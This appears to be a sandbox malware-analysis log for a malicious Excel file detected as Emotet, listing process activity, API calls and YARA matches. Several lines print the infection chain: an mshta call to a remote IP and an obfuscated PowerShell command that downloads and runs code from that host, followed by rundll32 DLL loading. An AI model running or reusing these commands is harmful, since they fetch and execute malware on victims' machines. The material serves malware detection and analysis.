                            Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\mshta.exe TID: 1832Thread sleep time: -360000s >= -30000s
                            Source: C:\Windows\SysWOW64\rundll32.exeAPI coverage: 3.2 %
                            Source: C:\Windows\SysWOW64\rundll32.exeAPI coverage: 3.2 %
                            Source: C:\Windows\SysWOW64\rundll32.exeAPI call chain: ExitProcess graph end node
                            Source: C:\Windows\SysWOW64\rundll32.exeAPI call chain: ExitProcess graph end node
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
                            Source: rundll32.exe, 0000000C.00000002.564500652.000000000057A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformation
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_10030334 VirtualQuery,GetSystemInfo,__invoke_watson,GetModuleHandleA,GetProcAddress,VirtualAlloc,VirtualProtect,
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_10021854 __EH_prolog3,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_10021854 __EH_prolog3,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,
                            Source: C:\Windows\SysWOW64\rundll32.exeFile Volume queried: C:\ FullSizeInformation
                            Source: C:\Windows\SysWOW64\rundll32.exeFile Volume queried: C:\ FullSizeInformation
                            Source: C:\Windows\SysWOW64\rundll32.exeFile Volume queried: C:\ FullSizeInformation
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_1003D873 LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__invoke_watson,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__invoke_watson,__decode_pointer,__decode_pointer,__decode_pointer,
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00354087 mov eax, dword ptr fs:[00000030h]
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001F4087 mov eax, dword ptr fs:[00000030h]
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00214087 mov eax, dword ptr fs:[00000030h]
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_002E4087 mov eax, dword ptr fs:[00000030h]
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00B14087 mov eax, dword ptr fs:[00000030h]
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_003B3487 mov eax, dword ptr fs:[00000030h]
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_00214087 mov eax, dword ptr fs:[00000030h]
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_10037657 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_10002280 SetLastError,SetLastError,SetLastError,SetLastError,GetNativeSystemInfo,SetLastError,VirtualAlloc,VirtualAlloc,SetLastError,GetProcessHeap,HeapAlloc,VirtualFree,SetLastError,VirtualAlloc,SetLastError,
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_10037657 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_1002F81E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_1003B89A SetUnhandledExceptionFilter,__encode_pointer,
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_1003B8BC __decode_pointer,SetUnhandledExceptionFilter,
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_1003ACCC __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_10037657 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_1002F81E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_1003B89A SetUnhandledExceptionFilter,__encode_pointer,
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_1003B8BC __decode_pointer,SetUnhandledExceptionFilter,
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_1003ACCC __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                            Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.168/vvv/ppp/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X
                            Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.168/vvv/ppp/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\mshta.exe mshta http://91.240.118.168/vvv/ppp/fe.html
                            Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.168/vvv/ppp/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\ProgramData\QWER.dll BBDD
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWow64\rundll32.exe C:\ProgramData\QWER.dll BBDD
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\ProgramData\QWER.dll",DllRegisterServer
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Bwqooqqzlaw\cojfo.cqz",OOkfVaPZ
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Bwqooqqzlaw\cojfo.cqz",DllRegisterServer
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Jcwhaivtpnbramh\xjgaylzytzzvl.srm",xvIpPUnGjiWnFD
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Jcwhaivtpnbramh\xjgaylzytzzvl.srm",DllRegisterServer
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Cdragpegkvqde\ljsxpi.ptx",mYtMYmZ
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Cdragpegkvqde\ljsxpi.ptx",DllRegisterServer
                            Source: Yara matchFile source: 364453688149503140239183.xls, type: SAMPLE
                            Source: Yara matchFile source: C:\Users\user\Desktop\364453688149503140239183.xls, type: DROPPED
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoA,
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetThreadLocale,GetLocaleInfoA,GetACP,
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: _strcpy_s,__snprintf_s,GetLocaleInfoA,LoadLibraryA,
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoA,
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetThreadLocale,GetLocaleInfoA,GetACP,
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: _strcpy_s,__snprintf_s,GetLocaleInfoA,LoadLibraryA,
                            Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
                            Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
                            Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
                            Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
                            Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\times.ttf VolumeInformation
                            Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\times.ttf VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\hh.exe VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_1003DAA7 cpuid
                            Source: C:\Windows\SysWOW64\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_1003906D GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_1003CE1A __lock,__invoke_watson,__invoke_watson,__invoke_watson,____lc_codepage_func,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,__invoke_watson,__invoke_watson,
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_100453C8 GetVersion,GetVersion,GetVersion,GetVersion,GetVersion,RegisterClipboardFormatA,

                            Stealing of Sensitive Information

                            barindex
                            Yara detected Emotet
                            Source: Yara matchFile source: 12.2.rundll32.exe.2a0000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.170000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 11.2.rundll32.exe.200000.1.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.2e90000.16.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.2850000.9.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.380000.2.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 11.2.rundll32.exe.1d0000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.4b0000.2.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.a30000.4.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.b20000.6.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.2520000.10.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.cc0000.6.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.bd0000.7.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.2e00000.10.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.2820000.8.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 16.2.rundll32.exe.270000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.3020000.13.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.1c0000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.a30000.6.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.a30000.4.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.b80000.5.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.2860000.10.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 16.2.rundll32.exe.2a0000.1.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.2820000.8.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.2f40000.12.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.1e0000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 16.2.rundll32.exe.270000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.470000.4.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.2e40000.12.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.2c90000.13.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 9.2.rundll32.exe.190000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.2f60000.13.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.24f0000.9.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.25e0000.7.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.310000.2.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.440000.3.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.3a0000.2.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.2dd0000.9.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.24f0000.9.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.380000.2.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.30b0000.13.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.ac0000.5.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.4b0000.2.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.2c60000.12.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.b20000.6.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.bd0000.7.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.2d00000.14.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 11.2.rundll32.exe.1d0000.0.raw.unpack, type: UNPACKEDPE
